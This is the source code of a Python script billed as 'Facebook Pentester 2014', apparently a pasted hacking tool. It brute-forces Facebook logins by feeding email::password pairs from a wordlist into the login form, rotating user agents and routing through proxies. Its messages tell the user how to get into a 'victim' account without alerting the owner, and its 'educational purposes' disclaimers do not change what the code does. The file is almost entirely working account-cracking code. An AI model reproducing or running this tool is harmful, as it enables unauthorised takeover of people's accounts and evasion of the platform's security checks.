#!/usr/bin/python#Facebook Pentester 2014 can crack into Facebook Id's 100%

1.  
2. #!/usr/bin/python
3. #Facebook Pentester 2014 can crack into Facebook Id's 100% without Interruption By Facebook Firewall !
4. #This program is for sale & the objectif of this product is only for educational purposes only.
5. #Changing Description of this Script won't make you the coder ^_^ !
6. #Don't Crack people facebook account's it's illegal !
7. #If you want to crack into someone's account, you must have the permission of the user.
8. #Mauritania Attacker is not responsible.
9.  
10. import re
11. import os
12. import sys
13. import random
14. import warnings
15. import time
16. try:
17. import mechanize
18. except ImportError:
19. print "[*] Please install mechanize python module first"
20. sys.exit(1)
21. except KeyboardInterrupt:
22. print "\n[*] Exiting program...\n"
23. sys.exit(1)
24. try:
25. import cookielib
26. except ImportError:
27. print "[*] Please install cookielib python module first"
28. sys.exit(1)
29. except KeyboardInterrupt:
30. print "\n[*] Exiting program...\n"
31. sys.exit(1)
32.  
33. warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
34.  
35. # define variable
36. __Script__ = "Facebook Pentester 2014 Priv8888!"
37. __Released__ = "27/01/2014 By Mauritania Attacker"
38. __moi__ = "Facebook Checkpoint Security Bypassed 100%"
39. verbose = False
40. useproxy = False
41. usepassproxy = False
42. log = 'ghost.log'
43. file = open(log, "a")
44. success = 'home_edit_profile'
45. checkpoint = 'checkpoint'
46. oldpass = 'You entered an old password'
47. fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
48. # some priv8 useragents for Facebook Security !
49. useragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
50. 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
51. 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
52. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
53. 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
54. 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
55. 'Microsoft Internet Explorer/4.0b1 (Windows 95)',
56. 'Opera/8.00 (Windows NT 5.1; U; en)',
57. 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
58. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
59. 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
60. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
61. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
62. 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
63. ]
64. facebook = '''
65.  
66. #Facebook Pentester 2014 Priv8.
67. #Coded By Mauritania Attacker.
68. #Features: Verbose Method + Intrusion.
69. #Details: Pentest Facebook Accounts + Anonymous Fast Proxy Undetectable.
70.  
71. Script : %s
72. New Security Bypass : %s
73. Released : %s''' % (__Script__, __moi__, __Released__)
74. option = '''
75. Usage : %s -w pentest.txt
76. Option : -w, --wordlist <filename> | Wordlist used for Cracking
77. -v, --verbose | Set %s will be verbose
78. -p, --proxy <host:port> | Set http proxy will be use
79. -k, --usernameproxy <username> | Set username at proxy will be use
80. -i, --passproxy <password> | Set password at proxy will be use
81. -l, --log <filename> | Specify output filename (default : ghost.log)
82. -h, --help <help> | Print this help
83.  
84. Example : %s -w pentest.txt"
85.  
86. P.S : add "&" to run in the background
87. ''' % (sys.argv[0], sys.argv[0], sys.argv[0])
88. hme = '''
89. Usage : %s -w pentest.txt
90. -h or --help for get help
91. ''' % sys.argv[0]
92.  
93. def helpme():
94. print facebook
95. print option
96. file.write(facebook)
97. file.write(option)
98. sys.exit(1)
99.  
100. def helpmee():
101. print facebook
102. print hme
103. file.write(facebook)
104. file.write(hme)
105. sys.exit(1)
106.  
107. for arg in sys.argv:
108. try:
109. if arg.lower() == '-u' or arg.lower() == '--user':
110. username = sys.argv[int(sys.argv[1:].index(arg))+2]
111. elif arg.lower() == '-w' or arg.lower() == '--wordlist':
112. wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
113. elif arg.lower() == '-l' or arg.lower() == '--log':
114. log = sys.argv[int(sys.argv[1:].index(arg))+2]
115. elif arg.lower() == '-p' or arg.lower() == '--proxy':
116. useproxy = True
117. proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
118. elif arg.lower() == '-k' or arg.lower() == '--userproxy':
119. usepassproxy = True
120. usw = sys.argv[int(sys.argv[1:].index(arg))+2]
121. elif arg.lower() == '-i' or arg.lower() == '--passproxy':
122. usepassproxy = True
123. usp = sys.argv[int(sys.argv[1:].index(arg))+2]
124. elif arg.lower() == '-v' or arg.lower() == '--verbose':
125. verbose = True
126. elif arg.lower() == '-h' or arg.lower() == '--help':
127. helpme()
128. elif len(sys.argv) <= 1:
129. helpmee()
130. except IOError:
131. helpme()
132. except NameError:
133. helpme()
134. except IndexError:
135. helpme()
136.  
137. def bruteforce(word):
138. try:
139. pos = word.find("::")
140. userEmail = word[0:pos]
141. word = word[pos+len("::"):len(word)]
142.  
143. print("userEmail: " + userEmail )
144. print("password: " + word )
145. file.write("[*] Trying " + userEmail + "::" + word + "\n" )
146. sys.stdout.flush()
147. rch = random.choice(useragent)
148. br.addheaders = [('User-agent', rch)]
149. # print("User Agent: " + rch )
150. opensite = br.open(fblogin)
151.  
152. # To show and print all forms name
153. # for form in br.forms():
154. # print "Form name:", form.name
155. # print form
156.  
157. # To show all control elements in the form
158. # br.form = list(br.forms())[0]
159. # for control in br.form.controls:
160. # print control
161. # print "type=%s, name=%s value=%s" % (control.type, control.name, br[control.name])
162.  
163. # To dump cookies data being sent and received
164. # dump();
165.  
166. # Release email account from autotext fill
167. # If email still auto-filled on login form, this script would not work as expected, so we need to release it
168.  
169. NotMe = "notme_cuid"
170. for link in br.links():
171. if (NotMe in link.url):
172. request = br.click_link(link)
173. response = br.follow_link(link)
174. # print response.geturl()
175.  
176. br.select_form(nr=0)
177.  
178. br.form = list(br.forms())[0]
179. br.form['email'] = userEmail
180. br.form['pass'] = word
181. br.submit()
182. response = br.response().read()
183.  
184. if verbose:
185. print response
186. if success in response:
187. print "\n\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/"
188. print "[*] userEmail : %s" % (userEmail)
189. print "[*] Password : %s\n" % (word)
190. file.write("\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/")
191. file.write("\n[*] userEmail : %s" % (userEmail))
192. file.write("\n[*] Password : %s\n\n" % (word))
193.  
194. # After the successful login, force to Logout (to clear the cookies & the session - Very important!)
195. for form in br.forms():
196. if form.attrs['id'] == 'logout_form':
197. br.form = form
198. br.submit()
199. elif checkpoint in response:
200. print "\n\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/"
201. print "[*] userEmail : %s" % (userEmail)
202. print "[*] Password : %s\n" % (word)
203. file.write("\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/")
204. file.write("\n[*] userEmail : %s" % (userEmail))
205. file.write("\n[*] Password : %s\n\n" % (word))
206.  
207. # In checkpoint, this account maybe has been logged in, so we need to Log it Out after the successful login
208. LogOut = "logout.php"
209. for link in br.links():
210. if (LogOut in link.url):
211. request = br.click_link(link)
212. response = br.follow_link(link)
213. # print response.geturl()
214. # print "This account has been logged out"
215. # else:
216. # print "Can not click Log Out link"
217.  
218. except KeyboardInterrupt:
219. print "\n[*] Exiting program...\n"
220. sys.exit(1)
221. except mechanize._mechanize.FormNotFoundError:
222. print "\n[*] Form Not Found\n"
223. file.write("\n[*] Form Not Found\n")
224. sys.exit(1)
225. except mechanize._form.ControlNotFoundError:
226. print "\n[*] Control Not Found\n"
227. file.write("\n[*] Control Not Found\n")
228. sys.exit(1)
229.  
230. # Priv8 Function to Dump Cookies Data
231. # def dump():
232. # for cookie in cj:
233. # print cookie.name, cookie.value
234.  
235. def releaser():
236. global word
237. for word in words:
238. bruteforce(word.replace("\n",""))
239.  
240. def main():
241. global br
242. global words
243. # Priv8 Function to enable dump()
244. # global cj
245. try:
246. br = mechanize.Browser()
247. cj = cookielib.LWPCookieJar()
248. br.set_cookiejar(cj)
249. br.set_handle_equiv(True)
250. br.set_handle_gzip(True)
251. br.set_handle_redirect(True)
252. br.set_handle_referer(True)
253. br.set_handle_robots(False)
254. br.set_debug_http(False)
255. br.set_debug_redirects(False)
256. br.set_debug_redirects(False)
257. br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
258. if useproxy:
259. br.set_proxies({"http": proxy})
260. if usepassproxy:
261. br.add_proxy_password(usw, usp)
262. if verbose:
263. br.set_debug_http(True)
264. br.set_debug_redirects(True)
265. br.set_debug_redirects(True)
266. except KeyboardInterrupt:
267. print "\n[*] Exiting program...\n"
268. file.write("\n[*] Exiting program...\n")
269. sys.exit(1)
270. try:
271. preventstrokes = open(wordlist, "r")
272. words = preventstrokes.readlines()
273. count = 0
274. while count < len(words):
275. words[count] = words[count].strip()
276. count += 1
277. except IOError:
278. print "\n[*] Error: Check your config path\n"
279. file.write("\n[*] Error: Check your config path\n")
280. sys.exit(1)
281. except NameError:
282. helpme()
283. except KeyboardInterrupt:
284. print "\n[*] Exiting program...\n"
285. file.write("\n[*] Exiting program...\n")
286. sys.exit(1)
287. try:
288. print facebook
289. print "\n[*] Starting Cracking at %s" % time.strftime("%X")
290. #print "[*] Account To Crack %s" % (username)
291. print "[*] Loaded :",len(words),"words"
292. print "[*] Cracking, please wait..."
293. file.write(facebook)
294. file.write("\n[*] Starting Cracking at %s" % time.strftime("%X"))
295. #file.write("\n[*] Account To Crack %s" % (username))
296. file.write("\n[*] Loaded : %d words" % int(len(words)))
297. file.write("\n[*] Cracking, please wait...\n")
298. except KeyboardInterrupt:
299. print "\n[*] Script Closed...\n"
300. sys.exit(1)
301. try:
302. releaser()
303. bruteforce(word)
304. except NameError:
305. helpme()
306.  
307. if __name__ == '__main__':
308. main()